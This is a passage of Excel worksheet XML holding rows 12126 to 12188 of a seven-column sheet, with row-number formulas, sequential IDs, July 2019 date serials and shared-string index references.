        <v>19637</v>
      </c>
      <c r="D12126" s="1">
        <v>43671</v>
      </c>
      <c r="E12126" t="s">
        <v>19643</v>
      </c>
      <c r="F12126" t="s">
        <v>10021</v>
      </c>
      <c r="G12126" t="s">
        <v>22268</v>
      </c>
    </row>
    <row r="12127" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12127">
        <f t="shared" si="189"/>
        <v>12126</v>
      </c>
      <c r="B12127">
        <v>2126</v>
      </c>
      <c r="C12127" t="s">
        <v>19637</v>
      </c>
      <c r="D12127" s="1">
        <v>43671</v>
      </c>
      <c r="E12127" t="s">
        <v>19741</v>
      </c>
      <c r="F12127" t="s">
        <v>9975</v>
      </c>
      <c r="G12127" t="s">
        <v>22269</v>
      </c>
    </row>
    <row r="12128" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12128">
        <f t="shared" si="189"/>
        <v>12127</v>
      </c>
      <c r="B12128">
        <v>2127</v>
      </c>
      <c r="C12128" t="s">
        <v>19637</v>
      </c>
      <c r="D12128" s="1">
        <v>43677</v>
      </c>
      <c r="E12128" t="s">
        <v>21369</v>
      </c>
      <c r="F12128" t="s">
        <v>9975</v>
      </c>
      <c r="G12128" t="s">
        <v>22270</v>
      </c>
    </row>
    <row r="12129" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12129">
        <f t="shared" si="189"/>
        <v>12128</v>
      </c>
      <c r="B12129">
        <v>2128</v>
      </c>
      <c r="C12129" t="s">
        <v>19637</v>
      </c>
      <c r="D12129" s="1">
        <v>43674</v>
      </c>
      <c r="E12129" t="s">
        <v>19640</v>
      </c>
      <c r="F12129" t="s">
        <v>10021</v>
      </c>
      <c r="G12129" t="s">
        <v>22271</v>
      </c>
    </row>
    <row r="12130" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12130">
        <f t="shared" si="189"/>
        <v>12129</v>
      </c>
      <c r="B12130">
        <v>2129</v>
      </c>
      <c r="C12130" t="s">
        <v>19637</v>
      </c>
      <c r="D12130" s="1">
        <v>43668</v>
      </c>
      <c r="E12130" t="s">
        <v>22272</v>
      </c>
      <c r="F12130" t="s">
        <v>9978</v>
      </c>
      <c r="G12130" t="s">
        <v>22273</v>
      </c>
    </row>
    <row r="12131" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12131">
        <f t="shared" si="189"/>
        <v>12130</v>
      </c>
      <c r="B12131">
        <v>2130</v>
      </c>
      <c r="C12131" t="s">
        <v>19637</v>
      </c>
      <c r="D12131" s="1">
        <v>43669</v>
      </c>
      <c r="E12131" t="s">
        <v>22274</v>
      </c>
      <c r="F12131" t="s">
        <v>10526</v>
      </c>
      <c r="G12131" t="s">
        <v>22275</v>
      </c>
    </row>
    <row r="12132" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12132">
        <f t="shared" si="189"/>
        <v>12131</v>
      </c>
      <c r="B12132">
        <v>2131</v>
      </c>
      <c r="C12132" t="s">
        <v>19637</v>
      </c>
      <c r="D12132" s="1">
        <v>43671</v>
      </c>
      <c r="E12132" t="s">
        <v>21996</v>
      </c>
      <c r="F12132" t="s">
        <v>9975</v>
      </c>
      <c r="G12132" t="s">
        <v>22276</v>
      </c>
    </row>
    <row r="12133" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12133">
        <f t="shared" si="189"/>
        <v>12132</v>
      </c>
      <c r="B12133">
        <v>2132</v>
      </c>
      <c r="C12133" t="s">
        <v>19637</v>
      </c>
      <c r="D12133" s="1">
        <v>43668</v>
      </c>
      <c r="E12133" t="s">
        <v>22277</v>
      </c>
      <c r="F12133" t="s">
        <v>10526</v>
      </c>
      <c r="G12133" t="s">
        <v>22278</v>
      </c>
    </row>
    <row r="12134" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12134">
        <f t="shared" si="189"/>
        <v>12133</v>
      </c>
      <c r="B12134">
        <v>2133</v>
      </c>
      <c r="C12134" t="s">
        <v>19637</v>
      </c>
      <c r="D12134" s="1">
        <v>43677</v>
      </c>
      <c r="F12134" t="s">
        <v>10526</v>
      </c>
      <c r="G12134" t="s">
        <v>22279</v>
      </c>
    </row>
    <row r="12135" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12135">
        <f t="shared" si="189"/>
        <v>12134</v>
      </c>
      <c r="B12135">
        <v>2134</v>
      </c>
      <c r="C12135" t="s">
        <v>19637</v>
      </c>
      <c r="D12135" s="1">
        <v>43676</v>
      </c>
      <c r="F12135" t="s">
        <v>10021</v>
      </c>
      <c r="G12135" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="12136" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12136">
        <f t="shared" si="189"/>
        <v>12135</v>
      </c>
      <c r="B12136">
        <v>2135</v>
      </c>
      <c r="C12136" t="s">
        <v>19637</v>
      </c>
      <c r="D12136" s="1">
        <v>43668</v>
      </c>
      <c r="E12136" t="s">
        <v>21624</v>
      </c>
      <c r="F12136" t="s">
        <v>10526</v>
      </c>
      <c r="G12136" t="s">
        <v>22280</v>
      </c>
    </row>
    <row r="12137" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12137">
        <f t="shared" si="189"/>
        <v>12136</v>
      </c>
      <c r="B12137">
        <v>2136</v>
      </c>
      <c r="C12137" t="s">
        <v>19637</v>
      </c>
      <c r="D12137" s="1">
        <v>43677</v>
      </c>
      <c r="F12137" t="s">
        <v>10526</v>
      </c>
      <c r="G12137" t="s">
        <v>22281</v>
      </c>
    </row>
    <row r="12138" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12138">
        <f t="shared" si="189"/>
        <v>12137</v>
      </c>
      <c r="B12138">
        <v>2137</v>
      </c>
      <c r="C12138" t="s">
        <v>19637</v>
      </c>
      <c r="D12138" s="1">
        <v>43676</v>
      </c>
      <c r="E12138" t="s">
        <v>19705</v>
      </c>
      <c r="F12138" t="s">
        <v>10021</v>
      </c>
      <c r="G12138" t="s">
        <v>22282</v>
      </c>
    </row>
    <row r="12139" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12139">
        <f t="shared" si="189"/>
        <v>12138</v>
      </c>
      <c r="B12139">
        <v>2138</v>
      </c>
      <c r="C12139" t="s">
        <v>19637</v>
      </c>
      <c r="D12139" s="1">
        <v>43677</v>
      </c>
      <c r="E12139" t="s">
        <v>20862</v>
      </c>
      <c r="F12139" t="s">
        <v>10021</v>
      </c>
      <c r="G12139" t="s">
        <v>22283</v>
      </c>
    </row>
    <row r="12140" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12140">
        <f t="shared" si="189"/>
        <v>12139</v>
      </c>
      <c r="B12140">
        <v>2139</v>
      </c>
      <c r="C12140" t="s">
        <v>19637</v>
      </c>
      <c r="D12140" s="1">
        <v>43672</v>
      </c>
      <c r="E12140" t="s">
        <v>19834</v>
      </c>
      <c r="F12140" t="s">
        <v>10526</v>
      </c>
      <c r="G12140" t="s">
        <v>22284</v>
      </c>
    </row>
    <row r="12141" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12141">
        <f t="shared" si="189"/>
        <v>12140</v>
      </c>
      <c r="B12141">
        <v>2140</v>
      </c>
      <c r="C12141" t="s">
        <v>19637</v>
      </c>
      <c r="D12141" s="1">
        <v>43674</v>
      </c>
      <c r="F12141" t="s">
        <v>10526</v>
      </c>
      <c r="G12141" t="s">
        <v>22285</v>
      </c>
    </row>
    <row r="12142" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12142">
        <f t="shared" si="189"/>
        <v>12141</v>
      </c>
      <c r="B12142">
        <v>2141</v>
      </c>
      <c r="C12142" t="s">
        <v>19637</v>
      </c>
      <c r="D12142" s="1">
        <v>43670</v>
      </c>
      <c r="E12142" t="s">
        <v>19638</v>
      </c>
      <c r="F12142" t="s">
        <v>10021</v>
      </c>
      <c r="G12142" t="s">
        <v>22286</v>
      </c>
    </row>
    <row r="12143" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12143">
        <f t="shared" si="189"/>
        <v>12142</v>
      </c>
      <c r="B12143">
        <v>2142</v>
      </c>
      <c r="C12143" t="s">
        <v>19637</v>
      </c>
      <c r="D12143" s="1">
        <v>43674</v>
      </c>
      <c r="E12143" t="s">
        <v>21269</v>
      </c>
      <c r="F12143" t="s">
        <v>10526</v>
      </c>
      <c r="G12143" t="s">
        <v>22287</v>
      </c>
    </row>
    <row r="12144" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12144">
        <f t="shared" si="189"/>
        <v>12143</v>
      </c>
      <c r="B12144">
        <v>2143</v>
      </c>
      <c r="C12144" t="s">
        <v>19637</v>
      </c>
      <c r="D12144" s="1">
        <v>43676</v>
      </c>
      <c r="E12144" t="s">
        <v>22288</v>
      </c>
      <c r="F12144" t="s">
        <v>9978</v>
      </c>
      <c r="G12144" t="s">
        <v>22289</v>
      </c>
    </row>
    <row r="12145" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12145">
        <f t="shared" si="189"/>
        <v>12144</v>
      </c>
      <c r="B12145">
        <v>2144</v>
      </c>
      <c r="C12145" t="s">
        <v>19637</v>
      </c>
      <c r="D12145" s="1">
        <v>43668</v>
      </c>
      <c r="E12145" t="s">
        <v>21415</v>
      </c>
      <c r="F12145" t="s">
        <v>10021</v>
      </c>
      <c r="G12145" t="s">
        <v>22290</v>
      </c>
    </row>
    <row r="12146" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12146">
        <f t="shared" si="189"/>
        <v>12145</v>
      </c>
      <c r="B12146">
        <v>2145</v>
      </c>
      <c r="C12146" t="s">
        <v>19637</v>
      </c>
      <c r="D12146" s="1">
        <v>43669</v>
      </c>
      <c r="E12146" t="s">
        <v>19917</v>
      </c>
      <c r="F12146" t="s">
        <v>9975</v>
      </c>
      <c r="G12146" t="s">
        <v>22291</v>
      </c>
    </row>
    <row r="12147" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12147">
        <f t="shared" si="189"/>
        <v>12146</v>
      </c>
      <c r="B12147">
        <v>2146</v>
      </c>
      <c r="C12147" t="s">
        <v>19637</v>
      </c>
      <c r="D12147" s="1">
        <v>43675</v>
      </c>
      <c r="E12147" t="s">
        <v>21485</v>
      </c>
      <c r="F12147" t="s">
        <v>10526</v>
      </c>
      <c r="G12147" t="s">
        <v>22292</v>
      </c>
    </row>
    <row r="12148" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12148">
        <f t="shared" si="189"/>
        <v>12147</v>
      </c>
      <c r="B12148">
        <v>2147</v>
      </c>
      <c r="C12148" t="s">
        <v>19637</v>
      </c>
      <c r="D12148" s="1">
        <v>43672</v>
      </c>
      <c r="E12148" t="s">
        <v>19727</v>
      </c>
      <c r="F12148" t="s">
        <v>9975</v>
      </c>
      <c r="G12148" t="s">
        <v>19728</v>
      </c>
    </row>
    <row r="12149" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12149">
        <f t="shared" si="189"/>
        <v>12148</v>
      </c>
      <c r="B12149">
        <v>2148</v>
      </c>
      <c r="C12149" t="s">
        <v>19637</v>
      </c>
      <c r="D12149" s="1">
        <v>43670</v>
      </c>
      <c r="E12149" t="s">
        <v>22293</v>
      </c>
      <c r="F12149" t="s">
        <v>10526</v>
      </c>
      <c r="G12149" t="s">
        <v>22294</v>
      </c>
    </row>
    <row r="12150" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12150">
        <f t="shared" si="189"/>
        <v>12149</v>
      </c>
      <c r="B12150">
        <v>2149</v>
      </c>
      <c r="C12150" t="s">
        <v>19637</v>
      </c>
      <c r="D12150" s="1">
        <v>43675</v>
      </c>
      <c r="E12150" t="s">
        <v>19650</v>
      </c>
      <c r="F12150" t="s">
        <v>10021</v>
      </c>
      <c r="G12150" t="s">
        <v>22295</v>
      </c>
    </row>
    <row r="12151" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12151">
        <f t="shared" si="189"/>
        <v>12150</v>
      </c>
      <c r="B12151">
        <v>2150</v>
      </c>
      <c r="C12151" t="s">
        <v>19637</v>
      </c>
      <c r="D12151" s="1">
        <v>43672</v>
      </c>
      <c r="E12151" t="s">
        <v>19781</v>
      </c>
      <c r="F12151" t="s">
        <v>10526</v>
      </c>
      <c r="G12151" t="s">
        <v>22296</v>
      </c>
    </row>
    <row r="12152" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12152">
        <f t="shared" si="189"/>
        <v>12151</v>
      </c>
      <c r="B12152">
        <v>2151</v>
      </c>
      <c r="C12152" t="s">
        <v>19637</v>
      </c>
      <c r="D12152" s="1">
        <v>43671</v>
      </c>
      <c r="E12152" t="s">
        <v>21297</v>
      </c>
      <c r="F12152" t="s">
        <v>10526</v>
      </c>
      <c r="G12152" t="s">
        <v>21298</v>
      </c>
    </row>
    <row r="12153" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12153">
        <f t="shared" si="189"/>
        <v>12152</v>
      </c>
      <c r="B12153">
        <v>2152</v>
      </c>
      <c r="C12153" t="s">
        <v>19637</v>
      </c>
      <c r="D12153" s="1">
        <v>43672</v>
      </c>
      <c r="F12153" t="s">
        <v>9975</v>
      </c>
      <c r="G12153" t="s">
        <v>22297</v>
      </c>
    </row>
    <row r="12154" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12154">
        <f t="shared" si="189"/>
        <v>12153</v>
      </c>
      <c r="B12154">
        <v>2153</v>
      </c>
      <c r="C12154" t="s">
        <v>19637</v>
      </c>
      <c r="D12154" s="1">
        <v>43668</v>
      </c>
      <c r="E12154" t="s">
        <v>20421</v>
      </c>
      <c r="F12154" t="s">
        <v>10021</v>
      </c>
      <c r="G12154" t="s">
        <v>22298</v>
      </c>
    </row>
    <row r="12155" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12155">
        <f t="shared" si="189"/>
        <v>12154</v>
      </c>
      <c r="B12155">
        <v>2154</v>
      </c>
      <c r="C12155" t="s">
        <v>19637</v>
      </c>
      <c r="D12155" s="1">
        <v>43676</v>
      </c>
      <c r="F12155" t="s">
        <v>10526</v>
      </c>
      <c r="G12155" t="s">
        <v>22299</v>
      </c>
    </row>
    <row r="12156" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12156">
        <f t="shared" si="189"/>
        <v>12155</v>
      </c>
      <c r="B12156">
        <v>2155</v>
      </c>
      <c r="C12156" t="s">
        <v>19637</v>
      </c>
      <c r="D12156" s="1">
        <v>43672</v>
      </c>
      <c r="E12156" t="s">
        <v>22300</v>
      </c>
      <c r="F12156" t="s">
        <v>10526</v>
      </c>
      <c r="G12156" t="s">
        <v>22301</v>
      </c>
    </row>
    <row r="12157" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12157">
        <f t="shared" si="189"/>
        <v>12156</v>
      </c>
      <c r="B12157">
        <v>2156</v>
      </c>
      <c r="C12157" t="s">
        <v>19637</v>
      </c>
      <c r="D12157" s="1">
        <v>43671</v>
      </c>
      <c r="E12157" t="s">
        <v>22302</v>
      </c>
      <c r="F12157" t="s">
        <v>10526</v>
      </c>
      <c r="G12157" t="s">
        <v>22303</v>
      </c>
    </row>
    <row r="12158" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12158">
        <f t="shared" si="189"/>
        <v>12157</v>
      </c>
      <c r="B12158">
        <v>2157</v>
      </c>
      <c r="C12158" t="s">
        <v>19637</v>
      </c>
      <c r="D12158" s="1">
        <v>43670</v>
      </c>
      <c r="E12158" t="s">
        <v>19672</v>
      </c>
      <c r="F12158" t="s">
        <v>10021</v>
      </c>
      <c r="G12158" t="s">
        <v>22304</v>
      </c>
    </row>
    <row r="12159" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12159">
        <f t="shared" si="189"/>
        <v>12158</v>
      </c>
      <c r="B12159">
        <v>2158</v>
      </c>
      <c r="C12159" t="s">
        <v>19637</v>
      </c>
      <c r="D12159" s="1">
        <v>43671</v>
      </c>
      <c r="E12159" t="s">
        <v>19690</v>
      </c>
      <c r="F12159" t="s">
        <v>9978</v>
      </c>
      <c r="G12159" t="s">
        <v>22305</v>
      </c>
    </row>
    <row r="12160" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12160">
        <f t="shared" si="189"/>
        <v>12159</v>
      </c>
      <c r="B12160">
        <v>2159</v>
      </c>
      <c r="C12160" t="s">
        <v>19637</v>
      </c>
      <c r="D12160" s="1">
        <v>43670</v>
      </c>
      <c r="E12160" t="s">
        <v>19640</v>
      </c>
      <c r="F12160" t="s">
        <v>10021</v>
      </c>
      <c r="G12160" t="s">
        <v>22306</v>
      </c>
    </row>
    <row r="12161" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12161">
        <f t="shared" si="189"/>
        <v>12160</v>
      </c>
      <c r="B12161">
        <v>2160</v>
      </c>
      <c r="C12161" t="s">
        <v>19637</v>
      </c>
      <c r="D12161" s="1">
        <v>43672</v>
      </c>
      <c r="E12161" t="s">
        <v>19640</v>
      </c>
      <c r="F12161" t="s">
        <v>10021</v>
      </c>
      <c r="G12161" t="s">
        <v>22307</v>
      </c>
    </row>
    <row r="12162" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12162">
        <f t="shared" si="189"/>
        <v>12161</v>
      </c>
      <c r="B12162">
        <v>2161</v>
      </c>
      <c r="C12162" t="s">
        <v>19637</v>
      </c>
      <c r="D12162" s="1">
        <v>43677</v>
      </c>
      <c r="E12162" t="s">
        <v>19705</v>
      </c>
      <c r="F12162" t="s">
        <v>10021</v>
      </c>
      <c r="G12162" t="s">
        <v>22308</v>
      </c>
    </row>
    <row r="12163" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12163">
        <f t="shared" ref="A12163:A12226" si="190">+ROW(A12162)</f>
        <v>12162</v>
      </c>
      <c r="B12163">
        <v>2162</v>
      </c>
      <c r="C12163" t="s">
        <v>19637</v>
      </c>
      <c r="D12163" s="1">
        <v>43669</v>
      </c>
      <c r="E12163" t="s">
        <v>20421</v>
      </c>
      <c r="F12163" t="s">
        <v>10021</v>
      </c>
      <c r="G12163" t="s">
        <v>22309</v>
      </c>
    </row>
    <row r="12164" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12164">
        <f t="shared" si="190"/>
        <v>12163</v>
      </c>
      <c r="B12164">
        <v>2163</v>
      </c>
      <c r="C12164" t="s">
        <v>19637</v>
      </c>
      <c r="D12164" s="1">
        <v>43674</v>
      </c>
      <c r="E12164" t="s">
        <v>19643</v>
      </c>
      <c r="F12164" t="s">
        <v>10021</v>
      </c>
      <c r="G12164" t="s">
        <v>22310</v>
      </c>
    </row>
    <row r="12165" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12165">
        <f t="shared" si="190"/>
        <v>12164</v>
      </c>
      <c r="B12165">
        <v>2164</v>
      </c>
      <c r="C12165" t="s">
        <v>19637</v>
      </c>
      <c r="D12165" s="1">
        <v>43671</v>
      </c>
      <c r="E12165" t="s">
        <v>20113</v>
      </c>
      <c r="F12165" t="s">
        <v>9978</v>
      </c>
      <c r="G12165" t="s">
        <v>22311</v>
      </c>
    </row>
    <row r="12166" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12166">
        <f t="shared" si="190"/>
        <v>12165</v>
      </c>
      <c r="B12166">
        <v>2165</v>
      </c>
      <c r="C12166" t="s">
        <v>19637</v>
      </c>
      <c r="D12166" s="1">
        <v>43674</v>
      </c>
      <c r="E12166" t="s">
        <v>22312</v>
      </c>
      <c r="F12166" t="s">
        <v>9975</v>
      </c>
      <c r="G12166" t="s">
        <v>22313</v>
      </c>
    </row>
    <row r="12167" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12167">
        <f t="shared" si="190"/>
        <v>12166</v>
      </c>
      <c r="B12167">
        <v>2166</v>
      </c>
      <c r="C12167" t="s">
        <v>19637</v>
      </c>
      <c r="D12167" s="1">
        <v>43670</v>
      </c>
      <c r="E12167" t="s">
        <v>22314</v>
      </c>
      <c r="F12167" t="s">
        <v>10526</v>
      </c>
      <c r="G12167" t="s">
        <v>22315</v>
      </c>
    </row>
    <row r="12168" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12168">
        <f t="shared" si="190"/>
        <v>12167</v>
      </c>
      <c r="B12168">
        <v>2167</v>
      </c>
      <c r="C12168" t="s">
        <v>19637</v>
      </c>
      <c r="D12168" s="1">
        <v>43672</v>
      </c>
      <c r="E12168" t="s">
        <v>21485</v>
      </c>
      <c r="F12168" t="s">
        <v>10526</v>
      </c>
      <c r="G12168" t="s">
        <v>22316</v>
      </c>
    </row>
    <row r="12169" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12169">
        <f t="shared" si="190"/>
        <v>12168</v>
      </c>
      <c r="B12169">
        <v>2168</v>
      </c>
      <c r="C12169" t="s">
        <v>19637</v>
      </c>
      <c r="D12169" s="1">
        <v>43669</v>
      </c>
      <c r="E12169" t="s">
        <v>19725</v>
      </c>
      <c r="F12169" t="s">
        <v>9978</v>
      </c>
      <c r="G12169" t="s">
        <v>22317</v>
      </c>
    </row>
    <row r="12170" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12170">
        <f t="shared" si="190"/>
        <v>12169</v>
      </c>
      <c r="B12170">
        <v>2169</v>
      </c>
      <c r="C12170" t="s">
        <v>19637</v>
      </c>
      <c r="D12170" s="1">
        <v>43674</v>
      </c>
      <c r="F12170" t="s">
        <v>10526</v>
      </c>
      <c r="G12170" t="s">
        <v>21743</v>
      </c>
    </row>
    <row r="12171" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12171">
        <f t="shared" si="190"/>
        <v>12170</v>
      </c>
      <c r="B12171">
        <v>2170</v>
      </c>
      <c r="C12171" t="s">
        <v>19637</v>
      </c>
      <c r="D12171" s="1">
        <v>43675</v>
      </c>
      <c r="E12171" t="s">
        <v>19849</v>
      </c>
      <c r="F12171" t="s">
        <v>10021</v>
      </c>
      <c r="G12171" t="s">
        <v>22318</v>
      </c>
    </row>
    <row r="12172" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12172">
        <f t="shared" si="190"/>
        <v>12171</v>
      </c>
      <c r="B12172">
        <v>2171</v>
      </c>
      <c r="C12172" t="s">
        <v>19637</v>
      </c>
      <c r="D12172" s="1">
        <v>43675</v>
      </c>
      <c r="E12172" t="s">
        <v>21141</v>
      </c>
      <c r="F12172" t="s">
        <v>10526</v>
      </c>
      <c r="G12172" t="s">
        <v>22319</v>
      </c>
    </row>
    <row r="12173" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12173">
        <f t="shared" si="190"/>
        <v>12172</v>
      </c>
      <c r="B12173">
        <v>2172</v>
      </c>
      <c r="C12173" t="s">
        <v>19637</v>
      </c>
      <c r="D12173" s="1">
        <v>43672</v>
      </c>
      <c r="E12173" t="s">
        <v>22320</v>
      </c>
      <c r="F12173" t="s">
        <v>10526</v>
      </c>
      <c r="G12173" t="s">
        <v>22321</v>
      </c>
    </row>
    <row r="12174" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12174">
        <f t="shared" si="190"/>
        <v>12173</v>
      </c>
      <c r="B12174">
        <v>2173</v>
      </c>
      <c r="C12174" t="s">
        <v>19637</v>
      </c>
      <c r="D12174" s="1">
        <v>43672</v>
      </c>
      <c r="E12174" t="s">
        <v>19640</v>
      </c>
      <c r="F12174" t="s">
        <v>10021</v>
      </c>
      <c r="G12174" t="s">
        <v>22322</v>
      </c>
    </row>
    <row r="12175" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12175">
        <f t="shared" si="190"/>
        <v>12174</v>
      </c>
      <c r="B12175">
        <v>2174</v>
      </c>
      <c r="C12175" t="s">
        <v>19637</v>
      </c>
      <c r="D12175" s="1">
        <v>43673</v>
      </c>
      <c r="E12175" t="s">
        <v>19640</v>
      </c>
      <c r="F12175" t="s">
        <v>9975</v>
      </c>
      <c r="G12175" t="s">
        <v>22323</v>
      </c>
    </row>
    <row r="12176" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12176">
        <f t="shared" si="190"/>
        <v>12175</v>
      </c>
      <c r="B12176">
        <v>2175</v>
      </c>
      <c r="C12176" t="s">
        <v>19637</v>
      </c>
      <c r="D12176" s="1">
        <v>43675</v>
      </c>
      <c r="E12176" t="s">
        <v>19640</v>
      </c>
      <c r="F12176" t="s">
        <v>10021</v>
      </c>
      <c r="G12176" t="s">
        <v>22324</v>
      </c>
    </row>
    <row r="12177" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12177">
        <f t="shared" si="190"/>
        <v>12176</v>
      </c>
      <c r="B12177">
        <v>2176</v>
      </c>
      <c r="C12177" t="s">
        <v>19637</v>
      </c>
      <c r="D12177" s="1">
        <v>43668</v>
      </c>
      <c r="E12177" t="s">
        <v>21678</v>
      </c>
      <c r="F12177" t="s">
        <v>9975</v>
      </c>
      <c r="G12177" t="s">
        <v>22325</v>
      </c>
    </row>
    <row r="12178" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12178">
        <f t="shared" si="190"/>
        <v>12177</v>
      </c>
      <c r="B12178">
        <v>2177</v>
      </c>
      <c r="C12178" t="s">
        <v>19637</v>
      </c>
      <c r="D12178" s="1">
        <v>43670</v>
      </c>
      <c r="E12178" t="s">
        <v>22326</v>
      </c>
      <c r="F12178" t="s">
        <v>10526</v>
      </c>
      <c r="G12178" t="s">
        <v>22327</v>
      </c>
    </row>
    <row r="12179" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12179">
        <f t="shared" si="190"/>
        <v>12178</v>
      </c>
      <c r="B12179">
        <v>2178</v>
      </c>
      <c r="C12179" t="s">
        <v>19637</v>
      </c>
      <c r="D12179" s="1">
        <v>43669</v>
      </c>
      <c r="F12179" t="s">
        <v>10526</v>
      </c>
      <c r="G12179" t="s">
        <v>22328</v>
      </c>
    </row>
    <row r="12180" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12180">
        <f t="shared" si="190"/>
        <v>12179</v>
      </c>
      <c r="B12180">
        <v>2179</v>
      </c>
      <c r="C12180" t="s">
        <v>19637</v>
      </c>
      <c r="D12180" s="1">
        <v>43677</v>
      </c>
      <c r="E12180" t="s">
        <v>19672</v>
      </c>
      <c r="F12180" t="s">
        <v>10021</v>
      </c>
      <c r="G12180" t="s">
        <v>22329</v>
      </c>
    </row>
    <row r="12181" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12181">
        <f t="shared" si="190"/>
        <v>12180</v>
      </c>
      <c r="B12181">
        <v>2180</v>
      </c>
      <c r="C12181" t="s">
        <v>19637</v>
      </c>
      <c r="D12181" s="1">
        <v>43670</v>
      </c>
      <c r="E12181" t="s">
        <v>22330</v>
      </c>
      <c r="F12181" t="s">
        <v>10526</v>
      </c>
      <c r="G12181" t="s">
        <v>22331</v>
      </c>
    </row>
    <row r="12182" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12182">
        <f t="shared" si="190"/>
        <v>12181</v>
      </c>
      <c r="B12182">
        <v>2181</v>
      </c>
      <c r="C12182" t="s">
        <v>19637</v>
      </c>
      <c r="D12182" s="1">
        <v>43672</v>
      </c>
      <c r="E12182" t="s">
        <v>19640</v>
      </c>
      <c r="F12182" t="s">
        <v>10021</v>
      </c>
      <c r="G12182" t="s">
        <v>22332</v>
      </c>
    </row>
    <row r="12183" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12183">
        <f t="shared" si="190"/>
        <v>12182</v>
      </c>
      <c r="B12183">
        <v>2182</v>
      </c>
      <c r="C12183" t="s">
        <v>19637</v>
      </c>
      <c r="D12183" s="1">
        <v>43674</v>
      </c>
      <c r="E12183" t="s">
        <v>19917</v>
      </c>
      <c r="F12183" t="s">
        <v>9975</v>
      </c>
      <c r="G12183" t="s">
        <v>22333</v>
      </c>
    </row>
    <row r="12184" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12184">
        <f t="shared" si="190"/>
        <v>12183</v>
      </c>
      <c r="B12184">
        <v>2183</v>
      </c>
      <c r="C12184" t="s">
        <v>19637</v>
      </c>
      <c r="D12184" s="1">
        <v>43676</v>
      </c>
      <c r="E12184" t="s">
        <v>22334</v>
      </c>
      <c r="F12184" t="s">
        <v>10526</v>
      </c>
      <c r="G12184" t="s">
        <v>22335</v>
      </c>
    </row>
    <row r="12185" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12185">
        <f t="shared" si="190"/>
        <v>12184</v>
      </c>
      <c r="B12185">
        <v>2184</v>
      </c>
      <c r="C12185" t="s">
        <v>19637</v>
      </c>
      <c r="D12185" s="1">
        <v>43674</v>
      </c>
      <c r="E12185" t="s">
        <v>19650</v>
      </c>
      <c r="F12185" t="s">
        <v>10021</v>
      </c>
      <c r="G12185" t="s">
        <v>22336</v>
      </c>
    </row>
    <row r="12186" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12186">
        <f t="shared" si="190"/>
        <v>12185</v>
      </c>
      <c r="B12186">
        <v>2185</v>
      </c>
      <c r="C12186" t="s">
        <v>19637</v>
      </c>
      <c r="D12186" s="1">
        <v>43673</v>
      </c>
      <c r="F12186" t="s">
        <v>9975</v>
      </c>
      <c r="G12186" t="s">
        <v>22337</v>
      </c>
    </row>
    <row r="12187" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12187">
        <f t="shared" si="190"/>
        <v>12186</v>
      </c>
      <c r="B12187">
        <v>2186</v>
      </c>
      <c r="C12187" t="s">
        <v>19637</v>
      </c>
      <c r="D12187" s="1">
        <v>43669</v>
      </c>
      <c r="E12187" t="s">
        <v>22338</v>
      </c>
      <c r="F12187" t="s">
        <v>10021</v>
      </c>
      <c r="G12187" t="s">
        <v>22339</v>
      </c>
    </row>
    <row r="12188" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12188">
        <f t="shared" si="190"/>
        <v>12187</v>
      </c>
      <c r="B12188">
        <v>2187</v>
      </c>
